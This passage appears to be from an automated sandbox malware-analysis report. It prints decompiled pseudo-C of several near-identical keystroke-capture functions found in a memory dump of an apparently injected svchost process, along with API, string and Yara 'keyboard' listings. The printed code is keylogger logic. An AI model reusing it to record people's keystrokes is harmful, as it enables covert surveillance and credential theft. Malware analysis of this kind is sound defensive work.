					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Next Track], xrefs: 00C85CC0

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85B8C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B8C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F22]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F22], xrefs: 00C85B8E

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85AAF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85AAF(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F10]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F10], xrefs: 00C85AB1

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85BAE, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BAE(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F24]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F24], xrefs: 00C85BB0

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85C14, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C14(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F8]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F8], xrefs: 00C85C16

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85DA0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DA0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Sleep]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Sleep], xrefs: 00C85DA2

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C85D02, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D02(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Mode Change]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

